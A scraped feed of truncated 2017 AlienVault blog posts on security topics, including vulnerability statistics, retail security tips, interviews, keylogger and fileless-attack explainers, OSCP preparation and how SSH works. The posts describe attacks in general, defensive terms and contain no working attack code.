conversations involving the related vulnerabilities and host value and impact information. The 2017 report focused on what the industry verticals have in common in terms of vulnerability categorization, which vendors and industries are affected the most by which vulnerabilities, which components affect the most the vulnerability risk determination, whether we could draw the same conclusion reached in terms of the vulnerability risk and social media correlation as far as the Dark Web is concerned, and how to use these data to efficiently manage your vulnerability risk management program. Before going on the discussion of our report’s results, a few disclaimers are due. First of all, this is not a random or representative sample. The data comes from our clients’ vulnerability population, which is necessarily skewed toward the industries most represented, including financial services and health care. Also, the sample is not all encompassing and cannot be considered representative of  the population of vulnerabilities. This is also not an Intrusion Detection System, meaning the system cannot be used to predict security intrusions. With that said, this research can still offer important insights to people that would like to improve their vulnerability risk management program. Industry Verticals   Figure 1   The first analysis we conducted in our customers’ vulnerability data was to understand overall which industry vertical has the most vulnerabilities (Figure 1), which was Healthcare, followed in second by the Financial Industry. A possible explanation for this is that the lower level of security maturity for Healthcare, and the huge number of assets under management for the Financial industry played a factor in explaining these numbers. Vendor Susceptibility Figure 2 Industries and Vendors ]]> 2017-11-27T14:00:00+00:00 http://feeds.feedblitz.com/~/500273276/0/alienvault-blogs~NopSec-State-of-Vulnerability-Risk-Management-Report www.secnews.physaphae.fr/article.php?IdArticle=440548 False None Equifax None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC While many people will be kicking off their holiday shopping this weekend to take advantage of brick-and-mortar or online deals, unsavory hackers will be working on gaining access to consumers’ personal information through retailers for malicious purposes. Retailers are often targeted during these peak trading periods when it may be easier for criminals to hide their actions in the traffic. Hackers may use distributed denial of service (DDoS) attacks to flood retailer networks to render them unavailable to customers. They could also look for vulnerabilities in a retailer’s web site and IT operations to exploit by redirecting traffic for online payments to a fraudulent site, or find a gap in cloud security. With the rise of ransomware, retailers are at greater risk than ever this holiday season. Last week’s news about a breach at Forever 21 is a reminder of what can happen if retailers haven’t taken all the steps needed to tighten their security posture. Below are five tips retailers could take to build up resilience against cyberattacks: 1.       Staff awareness: As retailers often hire temporary workers during the holidays, staff training is vital. Staff should be educated on the need to remain vigilant in validating customer identification, looking for any physical signs of intrusion, such as point-of-sale terminals showing signs of tampering. Staff should know what to do or who to call if they see anything suspicious. 2.       Monitor and detection: Retailers typically have widely distributed networks with many remote locations, plus an online presence, with many points of attack. Monitoring the network and endpoints is essential to detecting threats. Complimenting this with threat intelligence data can help identify emerging and popular threats against retailers. Most retailers would benefit from a centralized thread detection and response platform that can provide security visibility across cloud and on-premises environments, such as AlienVault USM Anywhere™. https://www.alienvault.com/products/usm-anywhere 3.       Share threat data: As many criminals share attack methods and hit multiple retailers at the same time – it is useful for retailers to share threat data amongst themselves. This can include malicious techniques and IOCs (indicators of compromise) so they can take pre-emptive steps to thwart attacks. The retail cyber intelligence sharing center https://r-cisc.org is a good resource for retailers. Additionally, AlienVault Open Threat Exchange (OTX) https://www.alienvault.com/open-threat-exchange is a free, crowd-sourced threat intelligence platform. 4.       Implement a response plan: Taking into account varied threat scenarios, retailers should implement response plans. These would include technical controls, such as isolating systems or rebuilding servers, or they could be more procedural and communications based – these also take into account how partners and customers should be notified of an incident. 5.       Have a backup plan: Backup procedures should be implemented in the event any systems become unavailable. For example, if the POS terminals are rendered inoperable, there should be alternative off-line means available to take payments. For consumers, the biggest danger from retail cyberattacks is loss of personal information, such as their Social Security number, da]]> 2017-11-24T14:00:00+00:00 http://feeds.feedblitz.com/~/498551330/0/alienvault-blogs~Retail-Security-Tips-Don%e2%80%99t-Let-Hackers-Ruin-the-Holiday-Season www.secnews.physaphae.fr/article.php?IdArticle=439797 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC For anyone that's worked in information security for any period, Jeremiah Grossman is a familiar name. Having worked in security for two decades he's seen many industry cycles come and go. Not content with simply being a professional hacker, highly acclaimed public speaker, published author, founder of WhiteHat Security, and current Chief of Security Strategy for endpoint security vendor SentinelOne, Jeremiah also holds a black belt in Brazilian Jiu-Jitsu. As InformationWeek put it, “Jeremiah is the embodiment of converged IT and physical security.” Over his career, Jeremiah has been an admired advocate of the IT Security industry, but also critical of many aspects, such as the lack of vendor accountability to customers. So I was pleased to be able to get some time with him to pick his brain to get some insight into what he thought some of the most pressing issues are, and how we could best approach them. We see the number of breaches on the rise and we hear a lot about nation-state actors and advanced threats. How many breaches in your opinion are due the lack of InfoSec know-how or available technology? Very few breaches are the result of a lack of InfoSec know-how or available technology. Whether it was the breaches of Equifax, Home Depot, Target, Maersk, Sony, DNC, or thousands of others –each with the exception of perhaps Stuxnet –was entirely preventable. These breaches were the products of missing patches, simple misconfigurations, no multi-factor authentication, weak endpoint protection, and well-understood software flaws. The InfoSec community has seen every attack to exploit these a thousand times — nothing really impresses us anymore.  It all boils down to a general lack of InfoSec basics. Although it may seem from those outside the community that there is a lack of available security technology, that notion couldn’t be farther from the truth. In fact, it’s quite the opposite. We’re drowning in ‘hot new’ security products, yet another announced each day. What may be the biggest challenge in InfoSec is that we are seeing too much technology being thrown at today’s threats -- with the desperate hope that something will eventually stick. While the bad guys are scaling up their attacks and becoming more deliberate, the InfoSec community is failing to match with the same speed and scale we are seeing from attacks. What role does product innovation or awareness and education have to play in breaches? Product innovation, awareness and education are huge when it comes to preventing breaches. In order to stop breaches from happening we have to know what we are up against, the motives behind such acts, and how adversaries are actually breaking into systems. To better understand what innovation, awareness and education is needed most, we must have the data that comes from these breaches. This is something we’ve been thankfully getting better at over the years. And with aggregate investigations into this data, we’re better able to put the right strategies into place in order to counteract them. For example, if a company is seeing an attack targeting them in an area where they are lacking proper defense measures, then they will need product innovation to cover that up.  With the proper technology innovation and products in general, we’ll be able to react better and faster to incoming attacks. As attackers continue to scale, speed of the defense is everything. You've spoken a lot in the past about incentives to do the right thing. Saying how those in the best position have limited incentives to make the right decision at the right time. What kind of incentives do you think need to be put in place? Simply put: Financial incentives. While other colleagues may prefer governmental regulations, I’m pe]]> 2017-11-22T14:00:00+00:00 http://feeds.feedblitz.com/~/497281472/0/alienvault-blogs~Jeremiah-Grossman-On-InfoSec-Basics-Incentives-and-Warranties www.secnews.physaphae.fr/article.php?IdArticle=438345 False None Equifax None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC What do the stats say? It is shocking to see that in July 2017, a data breach at Equifax led to the exposure of 145,500,000 consumer records, making it one of the largest data breaches in history. Further, the target of hacking attacks are not just personal users, but many more. Take a look: Businesses Medical and Healthcare entities Government or military targets Educational institutions From the above it is clearly evident that there is a strong need to understand and practice security measures to avoid online privacy intrusions. How keystroke logging works Keystroke logging can be achieved by both software and hardware. Let us see how these two methods work: Hardware keylogger A hardware keylogger is a device that resembles some part of the computer cabling and is connected in between the computer and keyboard. This resemblance makes it easy for the attacker to hide the device. Some examples include inline devices that are attached to the keyboard cable, keyboards with inbuilt keyloggers, etc. However, one drawback of using a hardware keylogger is that the attacker typically needs to return and uninstall the device in order to access the information that has been captured. Software keylogger Software keylogger is a computer program that needs to be downloaded and installed on the target computer. However, this software can also be a part of some malicious software downloaded unknowingly by the computer user or executed as a part of a rootkit that launches itself and works stealthily. The captured information is updated on the server periodically for the controller's access. What types of information do keyloggers capture? The capabilities of keyloggers vary according to their type and target. However, the following are some common actions done: Capture passwords that are entered by users Take screenshots of the device periodically Capture URLs visited via web browsers and screenshots of the web pages that are viewed Capture a list if all the applications that are running on the device Capture copies of sent emails Capture logs of all instant messaging (IM) sessions The data captured by a keylogger is automatically sent in the form of reports to a remote computer or web server, as defined by the attacker. The report is either sent by email, FTP or HTTP. How to avoid keylogger intrusions Use an Antivirus with Anti-Keylogger capabilities Go for an Antivirus Software with anti-keylogger capabilities, as it is a type of software specifically designed for the detection of keystroke logging software. Such software has the ability to delete or at least immobilize hidden keystroke logging software on a computer. Say no to free software Since keyloggers can easily attach themselves to freeware available over th]]> 2017-11-21T14:00:00+00:00 http://feeds.feedblitz.com/~/496682404/0/alienvault-blogs~Keystroke-Logging-How-it-Affects-the-Online-Privacy-of-Internet-Users www.secnews.physaphae.fr/article.php?IdArticle=437648 False None Equifax None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Perhaps your original baseline appeared somewhere between the 300 and 400 range of whatever you are measuring. A year later, when you return to check your baseline, the numbers have jumped considerably. Medic! These numbers look alarming, but if you are tracking the numbers continuously, rather than periodically, you would see more of a trend, rather than a spike. Over time, as your graph grows, you can see more of a periodic slope that probably better represents the monitored activity.  Here is a more complete view of the two events shown above. As you can see, this is a much less nerve-jarring picture than the two periodic snapshots. Of course, your ability to continuously track these things depends on what you are tracking, as well as other factors, such as competing priorities and workload.   This is where you must choose the items based on volatility.  For example, should bandwidth use tracking be an every-day event? If you are a SysAdmin, probably not, as a SysAdmin derives knowledge by viewing what is occurring over an extended period of time, so a weekly summary may be perfectly adequate to get a sense of how usage is changing.  However, if you are an InfoSec professional, you may be more concerned with daily spikes in activity, which, amongst other things could indicate data exfiltration. A capacity planner may be interested in an annual count of new and expired identities on the system, however, the InfoSec team is going to be very suspicious if a high number of accounts are added or removed over the course of a few days. One problem that many auditors have is that these trends are not hard and fast numbers.  I recall the words of an investment professional when someone asked about the financial market.  “It’s a barometer, not a thermometer.”  By tracking various activities at appropriate intervals, you can see what is changing in your environment at a sane level.  Know your baseline, but adjust it as required. Alarms may go off, and that is why you are doing what you do. Overall, if there are no emergencies, you can see if the patient is healthy and growing, or, in my personal case, simply aging. Age gracefully!  
]]> 2017-11-20T14:00:00+00:00 http://feeds.feedblitz.com/~/496077092/0/alienvault-blogs~Adjusting-Your-Baseline www.secnews.physaphae.fr/article.php?IdArticle=436743 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC here. But the TL;DR version is that Lisbon is a lovely city, and Bsides was a great event. But enough about me, let’s jump right in to it. Blockchains Blockchains are a bit of a running joke in that few people properly understand what it is, but are content to throw it around as a solution to everything and anything. You know something is over saturating the market when a simple search for blockchain brings up more memes than actual articles. Do check out this article by Jack Preston which gives a great breakdown on hashes, and the structure of a basic blockchain. Everything you wanted to know about blockchains but were too afraid to ask | Unwttng.com The Motherboard guide to not getting hacked The good folk over at Motherboard have put together a handy guide to not getting hacked.  It covers the basics, mobile security, privacy, messaging, and even avoiding state and police surveillance. It’s worth a read, and even better, it’s worth sharing with people who may not be overly familiar with security. The Motherboard guide to not getting hacked | Motherboard Smart Drugs It was only a matter of time – but digital pills are here that talk to your doctor. The idea is that the pill will signal a smartphone once it reaches the gut so doctors can track whether patients are taking their medicine. The main use-case discussed so far has been to ensure mental health patients are taking their medication on time. There could probably be other uses, maybe an app could helpfully remind people to take their medication, and automatically log what was taken and when. Reducing the need for those annoying multi-compartment boxes that some people have which carries all their medicine for the week. However, there are definitely darker uses for this technology. Given how poorly secured medical devices have been, it’s probably not too difficult to spoof the messages, to make it appear as if a patient has taken an overdose. Or even blocking the fact that someone has taken their medication, resulting in the doctor forcing an overdose... I should stop spending time with so many bad hackers. Digital pills that talk to your doctor are here | The Wall Street Journal Major Malfunction Most people in the industry have heard of Adam Laurie aka Major Malfunction. He’s been involved in DefCon and the London chapter for – well, as long as I can remember. A lot of Adam’s research is focussed around RFID / NFC security. It was great to see him featured in a Vice video on hacking passports and credit cards. It’s well worth the watch – if for nothing else to be jealous of his impressive house! Hacking passports and credit cards with Major Malfunction | Vice.com How Facebook figures out everyone you’ve ever met How do these things happen? A social work]]> 2017-11-17T14:00:00+00:00 http://feeds.feedblitz.com/~/494314424/0/alienvault-blogs~Things-I-Hearted-this-Week-th-Nov www.secnews.physaphae.fr/article.php?IdArticle=435908 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC The Lisbon Experience It was the first time I’d visited Lisbon, or indeed even Portugal, so the conference gave me a chance to take in some of the sites. Even though it was November, the weather was uncharacteristically warm, which allowed me to explore the old part of town with it’s narrow cobbled streets full of character. The city does have an undoubtedly Mediterranean vibe to it. The shops open at a leisurely time, most supermarkets were opening up at 9am and no-one appeared to be in a rush in the early hours. Although, later in the evening things are very different and most places are open till midnight. Overall the people were generally very friendly and English is widely spoken, so I had no troubles getting around and interacting with the locals. The Conference BSides Lisbon itself was very well organised. It was its fourth year - which is about the time most conferences start to really hit their stride. There were around 300 attendees, which gave it that tight-knit feeling. I really like conferences that are around the 500 attendee range, giving a lot of variety of attendee, whilst not completely overwhelming you. Sometimes, the small things make all the difference. The badges were awesome - upcycling some old floppy disks. Even the t-shirts had an easter egg which shows up under light in the dark. Clearly the organisers went through a lot of time and effort in making the experience enjoyable by all.  The attendees all seemed to have a good time, were well fed and looked after over the two days with ample networking opportunities. A double bonus for me was that I was invited to deliver a keynote and AlienVault was one of the awesome sponsors of the event. Overall, two thumbs up and a big cheesy grin from me! Here's the video of my talk: ]]> 2017-11-16T14:00:00+00:00 http://feeds.feedblitz.com/~/493629882/0/alienvault-blogs~BSides-Lisbon-and-the-Global-Community www.secnews.physaphae.fr/article.php?IdArticle=434892 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC We built the AlienVault® Open Threat Exchange® (OTX™) to disrupt the traditional information siloes in the threat intelligence community, making threat intelligence open and free for anyone to share and consume, including security researchers, IT security professionals, ISACs, and academic and other institutions. Today, OTX has 65,000+ global participants in 140 countries who contribute over 14 million threat artifacts daily. Now, Cisco users can leverage the full breadth of the OTX through a new AlienVault partnership.  Today, we are excited to announce a new partnership with Cisco to integrate OTX threat data in the Cisco Threat Intelligence Director (CTID). Through this new technology partnership, CTID receives and operationalizes OTX threat data, providing monitoring and actionable insights to users so they can investigate and quickly respond to the threats impacting their critical infrastructure.  With the combined power of AlienVault OTX and the Cisco Threat Intelligence Director, IT security teams can respond to incidents more quickly and with confidence that they’re getting the most up-to-date and comprehensive threat intelligence available. Read the full Cisco blog here > https://blogs.cisco.com/security/expanding-cisco-security-ecosystem This integration underscores the ongoing partnership between AlienVault and Cisco, two leading cybersecurity technology providers. Earlier this year, we announced our Cisco Umbrella integration with the launch of the AlienApp for Cisco Umbrella. The AlienApp for Cisco Umbrella, included in USM Anywhere, enables security analysts to respond threats detected in USM Anywhere by sending the malicious domain information to Cisco Umbrella to block any further communications with that domain. These response actions can be automated, helping to reduce the time between detection and response. Join the AlienVault OTX We continue to evolve and expand the reach of the Open Threat Exchange (OTX), the world’s first truly open threat intelligence sharing community. The threat data shared by OTX members includes real-time information on new attacks, malware, and ransomware outbreaks as they emerge in the wild.  These artifacts provide deep security insights into pressing threats and help organizations to gain greater security visibility into their critical IT environments, so they can respond to attacks quickly and confidently. OTX is free to join and to use. Sign up today at otx.alienvault.com >      ]]> 2017-11-15T17:30:00+00:00 http://feeds.feedblitz.com/~/493021314/0/alienvault-blogs~Powering-the-Cisco-Threat-Intelligence-Director-with-AlienVault-OTX-Threat-Data www.secnews.physaphae.fr/article.php?IdArticle=434025 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Steve Ragan has been covering the security industry for longer than some people have been working in it. More than a journalist, Steve is an active participant in the community and is often found at security conferences helping out and exchanging stories – all with a cheeky grin that radiates a youthful playfulness. Steve, you've been covering information security / cybersecurity for many years now. What has been some of the biggest changes you've seen in the industry during this time? There have been a few changes. The first one that stands out to me is the influx of new blood to the industry. People have come in with new ideas and viewpoints, and honestly, I think it's had an impact. I see them at conferences and they're excited, energized and happy to be part of something bigger than themselves. I've also seen us older folk grow up some, which is a good thing.  A few years ago, the concept of a bug bounty was foreign, but now it's commonplace. The debate between Full Disclosure and "responsible" or "coordinated" disclosure, that's another change. I'm a Full Disclosure person – a lot of us were back then – but even I've changed somewhat, as I see the upside for coordinated disclosure on some things, even if I still think the practice overall was originally developed to punish researchers. Professionally, one of the changes I've seen develop over the years is how we cover security in the media. It's gone from the back pages to headline news, and there is certainly more attention given to software flaws, failed security standards and practices, and the role security plays within an organization.  As a journalist, you must get pitched like crazy. What things really grab your interest amongst all the noise? Impact. If the pitch can demonstrate impact, it gets my attention. A good deal of my story development process follows a basic pattern. Pain - what is the pain, why does it exist, where did it come from? Impact - what impact does this pain have on a person or organization? Resolution - what can you do to fix the pain? Pitches that come close to aligning to that will always get a read.  What aspects of your job do you really enjoy? Research - I love researching a story and finding the hidden gem of information that will help someone working in a cube or in the back office fix a given problem. Education - I like explaining things to the wider public, those outside of the echo chamber. The bonus for me is that while I'm doing both of those things, I get a chance to learn myself, and interact with experts who are happy to teach.  When investigating a story, are there any trusted sources you go to, or do you prefer to do research yourself? I have trusted sources in various markets and areas of security. So, depending on the story, one of them will get a call. If the story requires research, I'll do that myself, but it isn't uncommon for a source to help me out by pointing me in the right direction.  Every day brings about new breaches. How important do you find it to be first to break a story?  Breaking a story, assuming you mean be the first to cover something, isn't important to me at all. It's nice to be first, but I'd rather be right and have actual information for readers to understand scope and impact. Even if that means I’m the 9th journalist to publish. Other journalists might feel differently, but security is a very small space still, so trying to chase a story just to be first will wear you down rather quickly. Instead, I focus on the value add, and try and get original ideas or concepts into a story that help in th]]> 2017-11-15T14:00:00+00:00 http://feeds.feedblitz.com/~/492907046/0/alienvault-blogs~Steve-Ragan-Writing-for-Impact www.secnews.physaphae.fr/article.php?IdArticle=434026 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC There seems to be all sorts of advice on the Internet on how to secure IoT devices. When not advertising products that could “protect all your Internet-connected home devices from hackers”, much of the user-targeted advice found online seems to be centered around very basic security advice such as strong passwords, two factor authentication (2FA), software/firmware updates, encryption, firewalls etc., or slightly more advanced approaches such as installing a Unified Threat Management (UTM) appliance (in other words: suggesting that home users buy products targeted at businesses), “protecting the perimeter" (with no accompanying explanation to the user as to what a perimeter is) etc. While some of this advice is useful to protect users from obvious vulnerabilities/threats, most of this sort of advice might do more harm than good, and lull users into a false sense of security (e.g. you are not automatically safe if you encrypt and/or 2FA all the things). Further, directly transposing security solutions targeted at large IT infrastructures to home users without meaningfully tailoring these solutions to novice users is not a great strategy (e.g. risk assessment is something traditionally performed by security professionals, and expecting a novice user to meaningfully perform it, especially in an interconnected ecosystem like IoT with complex, non-obvious attack paths, is an unfair burden; same with asking home users to use products targeted at enterprise security). In essence, educating users can only go so far in a complex ecosystem such as the IoT, and we are still left with problems such as these: Users might not be able to assess what is relevant/irrelevant information, and meaningfully internalize the security advice that is available online. Users might lack the technical expertise to gauge how the threats/vulnerabilities apply in context. Users might lack the experience to analyze how the information on threats/vulnerabilities/advice fits into the bigger picture (i.e., their overall Personal Threat Model). So, it looks like we need some sort of framework to address these issues listed above. In my recent op-ed for Ars Technica, I discussed how there currently are no proper mechanisms to help users assess their risk in the IoT ecosystem, and how Personal Threat Models are quite inadequate in this context. In an attempt to reduce the ambiguity around users determining their risk tolerance t]]> 2017-11-14T14:00:00+00:00 http://feeds.feedblitz.com/~/492299818/0/alienvault-blogs~Primeing-for-Amazon-and-Other-IoT-Devices www.secnews.physaphae.fr/article.php?IdArticle=432889 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC The threat landscape is constantly evolving, and we’re currently seeing a growing number of cyber criminals making a fundamental change in the way they carry out their attacks. Rather than installing executable files via phishing that antivirus solutions can easily scan and detect, they’re utilizing exploits, scripts, and otherwise legitimate administration tools to run malicious code directly from memory. As a result, these “fileless” attacks are bypassing traditional security defenses and wreaking havoc on victim networks. With fileless attacks on the rise, there still remains a great deal of confusion around the use of the term “fileless” and what it actually means. To clarify what constitutes a fileless attack and help you better prepare your organization for facing them, let’s debunk five of the most common myths and misunderstandings: Myth #1: Fileless attacks never involve files Perhaps the biggest point of contention and confusion surrounding fileless attacks is that they can and often do involve files, especially during the early initial infection stage. For example, an attack may begin with an employee tricked into opening a Word document they receive in a phishing email, and activating a macro or script embedded inside. That macro or script launches PowerShell, a legitimate framework built into Windows for automating system administration tasks. From there, the attacker uses PowerShell to execute malicious code directly in memory, making the attack from this point forward truly fileless. Because attacks can have both fileless and file-based components, debating whether they’re truly 100% fileless from start to finish is beside the point. Terms like “fileless attack” and “fileless malware” are used interchangeably, but they’re often misnomers that simply imply an attack utilizes fileless tactics or techniques at one stage or another. Myth #2: Fileless attacks are a brand new threat In truth, many fileless techniques have been around for some time. In-memory exploits, for example, date back to the prolific Code Red and SQL Slammer worms of the early 2000s. Metasploit, the open source framework for developing and executing remote exploit code was created in 2003. Mimikatz, a popular penetration testing tool for dumping credentials straight from memory, has been around since 2011. Both have been used to carry out attacks that actively avoid writing malicious executable files to disk. One of the reasons we’re seeing such a growing influx of fileless attacks now, however, is because many antivirus vendors are bolstering their file-scanning capabilities with advances in machine learning. In response, attackers are revisiting these pre-existing fileless tools and techniques and utilizing them to bypass file-scanning security solutions altogether. Myth #3: Only APT and nation-state actors use fileless techniques Many high-profile fileless attacks conducted in the past have involved sophisticated hacking groups (Stuxnet, Duqu, etc.), but now we’re also seeing fileless techniques being incorporated into a far wider variety of attacks such as ransomware campaigns.]]> 2017-11-13T14:00:00+00:00 http://feeds.feedblitz.com/~/491667960/0/alienvault-blogs~Busting-Myths-About-Fileless-Attacks www.secnews.physaphae.fr/article.php?IdArticle=432118 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Today, we are taking further action to make security monitoring accessible for all with the launch of new editions-based pricing and deployment options for USM Anywhere. Our three new USM Anywhere Editions—Essentials, Standard, and Enterprise—expand the pricing and deployment flexibility for organizations of all sizes and budgets, from the SMB to the Enterprise. Whether it’s a small business getting started with its security program, a mid-size organization with a mix of on-premises and public cloud infrastructure, a geographically distributed enterprise with multiple sites, or an MSSP monitoring multiple customers’ environments, any organization can choose the best deployment option to meet its security and compliance goals without the upfront investment and risk associated with traditional security solutions. And, as a subscription-based cloud service, USM Anywhere readily scales and adapts to continually meet IT and business needs as they evolve. USM Anywhere Essentials Edition AlienVault USM Anywhere Essentials Edition provides the essential security capabilities needed for effective threat detection and response. This option provides an affordable entry point for organizations with a limited budget or security resources to establish a security and compliance program quickly, easily, and affordably. USM Anywhere Standard Edition AlienVault USM Anywhere Standard Edition is ideal for IT security teams that are looking to gain operational efficiency and significantly reduce their time to response (TTR) through advanced security orchestration, automated incident response, and deep security analysis. This edition includes integrated ticketing and alerting with third-party tools like Jira, Service Now, and Slack, as well as advanced threat detection capabilities, including dark web monitoring. USM Anywhere Enterprise Edition AlienVault USM Anywhere Enterprise Edition is designed for organizations with large or heavily distributed IT environments. It includes all of the features of Essentials and Standard, plus higher capacity options for monthly data volumes and federation capabilities for centralized security monitoring across multiple sites and infrastructures. Additionally, available for USM Anywhere Standard and Enterprise Editions, we’ve added 24 x 5 and 24 x 7 support, respectively, monthly technical success checks with a technical account manager, and much more. To discover all of the features and deployment details of each USM Anywhere Edition, visit our pricing page here. To learn more about AlienVault customer success, visit the AlienVault Mission Control.  ]]> 2017-11-07T14:00:00+00:00 http://feeds.feedblitz.com/~/487807924/0/alienvault-blogs~New-AlienVault-USM-Anywhere%e2%84%a2-Editions-Expand-Pricing-and-Deployment-Flexibility-for-All www.secnews.physaphae.fr/article.php?IdArticle=429715 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Penetration Testing with Kali (PWK) course. Taking the course is mandatory for you to become eligible to take the OSCP. In addition to the knowledge you gain from the course, it opens doors to several career opportunities in information security. Of course, those who pass get bragging rights too. If you ask OSCP-takers about the difficulty level of the exam, you will get varied answers but most people say that it's the most difficult exam they've taken in their lives. This is why it is critical to prepare well for it. The PWK course doesn’t teach you everything, but the materials are enough to get you started. I cannot emphasize enough the importance of preparing prior to the course. Here’s a list of the things you need to learn to get prepared for OSCP: Linux and Windows Environment - You need to be familiar with both. These will help you spot clues for privilege escalation. I’m a Windows guy and during the labs I learned Linux the hard way. Linux and Windows Commands - Knowing Linux and Windows commands helps a lot. Brush up on them! Basic Programming Skills - Expect to debug and rewrite exploits, so know Bash Scripting. This will help you to automate redundant tasks. Web application attacks (SQLi, XSS, Local File Inclusion, Remote File Inclusion and Command Execution) - Expect a lot of web application content in the labs. Also practice bypassing web security filters for injection attacks. Metasploit Framework – Brush up on creating payloads with different formats, using multi handlers, and using staged vs non-staged payloads. Knowing these things will save you some time during your exam. Nmap - Different scanning techniques and Nmap NSE Scripts will help you a lot during your lab or exam. Netcat and Ncat - You’ll be using these a lot during the OSCP. Wireshark and tcpdump - Those are important because you’ll be using Wireshark to debug your exploit - or tcpdump, when machines don’t have a GUI. Windows and Linux Privilege Escalation - Aside from using kernel exploits, brush up on misconfigurations like weak service/file permissions and NFS/Shares. Escaping restricted shells and spawning shells - You’ll encounter these a lot during your OSCP. File transfer - It is important that you know the different techniques to transfer files to a target machine. Aside from those topics, these books will also come in handy: Kali Linux Revealed - To freshen up your Linux Fundamentals. Penetration Testing: A Hands-on Introduction to Hacking - One of my favorite books. This book covers almost all the aspects of what the OSCP entails. ]]> 2017-11-06T14:00:00+00:00 http://feeds.feedblitz.com/~/487089782/0/alienvault-blogs~How-to-Prepare-to-Take-the-OSCP www.secnews.physaphae.fr/article.php?IdArticle=428953 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Red Cross in 2016. Contractor breach exposes 50k Aussie govt, bank staff records | IT News AMP among companies affected by data breach of 50,000 staff records | The Guardian Wrestling student hacks grades A former chemistry student allegedly used keystroke-logging gadgets to steal tutors' passwords, change classmates' grades and download copies of exams ahead of time. Amateur wrestler Trevor Graves, 22, who studied at the University of Iowa was arrested and indicted this month on two hacking charges – each of which could land him up to ten years in the clink if found guilty. In paperwork (pdf) submitted to an Iowa district court, FBI agent Jeffrey Huber recounted that in December of last year one of the university's teachers noticed that Graves' grades had mysteriously improved. High-tech cheating scheme prompts charges at University of Iowa | Press Citizen FBI: Student wrestler grappled grades after choking passwords from PCs using a key logger | The Register Hackers Using Default SSH Creds to Take Over Ethereum Mining Equipment A threat actor is mass-scanning the Internet for Ethereum mining equipment running ethOS that is still using the operating system's default SSH credentials. The attacker is using these creds to gain access to the mining rig and replace the owner's Ethereum wallet address with his own. Replacing this wallet ID sends all subsequent mining revenue to the attacker instead of the equipment's real owner. Change your default credentials, kids. Or better still, manufacturers – force users to change default credentials on first use! Hackers Using Default SSH Creds to Take Over Ethereum Mining Equipment | Bleeping Computer How to become a pentester This one is from the archives, but equally relevant today as it was two years ago when published. Going through a lot of the methodology and answering most questions budding pen testers would have. How to become a pentester | Corelan Team Circle with Disney web filter riddled with vulnerabilities A ‘smart’ thing made by Disney has more holes in it than swiss cheese. Who could have ever predicted such a thing? Circle]]> 2017-11-03T13:00:00+00:00 http://feeds.feedblitz.com/~/485064892/0/alienvault-blogs~Things-I-Hearted-this-Week-%e2%80%93-rd-November www.secnews.physaphae.fr/article.php?IdArticle=427990 False Guideline Uber None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Tatu Ylönen CEO and founder of SSH Communications Security, wrote about how he invented SSH in SC Magazine: “While attending school in Helsinki, I discovered a password ‘sniffer' attack in our university network. To shield our data, I wrote a program to protect information as it moved from point to point throughout the network. I called it the 'secure shell', or SSH for short.” Today, nearly every major network environment – including those in governments, large enterprises and financial institutions – uses a version of SSH to protect data in transit and let administrators manage systems remotely. Talk about turning lemons into lemonade. Ylönen was dissatisfied by the lack of security in the rlogin, TELNET, ftp, and rsh protocols, so he devised his own solution. He released the first version of SSH as freeware in July 1995. Adoption exploded. By the end of 1995 there were about 20,000 SSH users. He founded SSH Communications Security by December 1995. By the year 2000, there were about 2 million SSH users. SSH has been assigned to TCP port 22. Many operating systems have SSH software preinstalled, including most versions of Linux, macOS, Solaris, FreeBSD, OpenBSD, NetBSD, and OpenVMS. There are SSH applications for Windows, but they aren't preinstalled and must be installed manually. So, here's how SSH works The SSH protocol is based on the client-server model. Therefore, an SSH client must initiate an SSH session with an SSH server. Most of the connection setup is conducted by the SSH client. Public key cryptography is used to verify the identity of the SSH server, and then symmetric key encryption and hashing algorithms are used to maintain data transmission in ciphertext. That way, privacy and integrity of data transmission in both directions between the client and server is assured, man-in-the-middle attacks are mitigated. The steps involved in creating an SSH session go like this: Client contacts server to initiate a connection. The server responds by sending the client a public cryptography key. The server negotiates parameters and opens a secure channel for the client. The user, through their client, logs into the server. There are different ciphers that can be used for SSH depending on the applications being used. Some of them include: CHACHA20 AES-GCM Blowfish-CBC AES128-CTR AES192-CTR AES256-CTR Arcfour Cast128-CBC Usually either an implementation of ]]> 2017-11-01T13:00:00+00:00 http://feeds.feedblitz.com/~/483545294/0/alienvault-blogs~Explain-How-SSH-Works-to-Me www.secnews.physaphae.fr/article.php?IdArticle=426693 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC penetration test.   I cannot tell you how many professionals consider this as the de facto (and sometimes only) test of their security.  Unfortunately, when taken alone they’re testing the wrong thing.  In the recent Cyber Security Intelligence Index, IBM found that 60% of breaches occur from insider threats.  That means that 60% of the time your data isn’t stolen by someone breaking into your network, you gave them the keys. Don’t get me wrong, a penetration test absolutely has its place in a holistic security program but a security program it is not.  The insider threats statistic mentioned earlier doesn’t necessarily mean your organization is full of individuals waiting for the right time to sell your intellectual property to your biggest competitor; it means that the breaches that occurred were a result of insider action.  The difference is fairly nuanced so let me give you a few examples: A system administrator’s phone downloaded malicious software that allowed access to the organization’s databases An accounting clerk receives an email that appears to be from the CFO requesting a wire transfer to an overseas bank account The CEO clicks on a link from his daughter containing malicious software The HR director uses his personally owned computer, which is infected with remote control software, to connect to sensitive HR documents over the organization’s VPN. These scenarios happen far more than you think.  How many of the above examples would be identified via a penetration test?  Nada.  Unfortunately, the biggest threat to corporate security is corporate employees - whether malicious or not.  To counteract this threat, you need a comprehensive security program.   What is a comprehensive security program?   I’m glad you asked.  A security program is a set of actions and documents which outline what and how the organization is securing sensitive information.  The end goal of a security program is to establish clear and concise metrics and goals which will allow the ever-changing organization to adapt to new threats and identify weaknesses.  The first step of a security program is to define the program itself in what is called a security plan.  The security plan is simply the identification of what is going to be secured, responsibilities, and 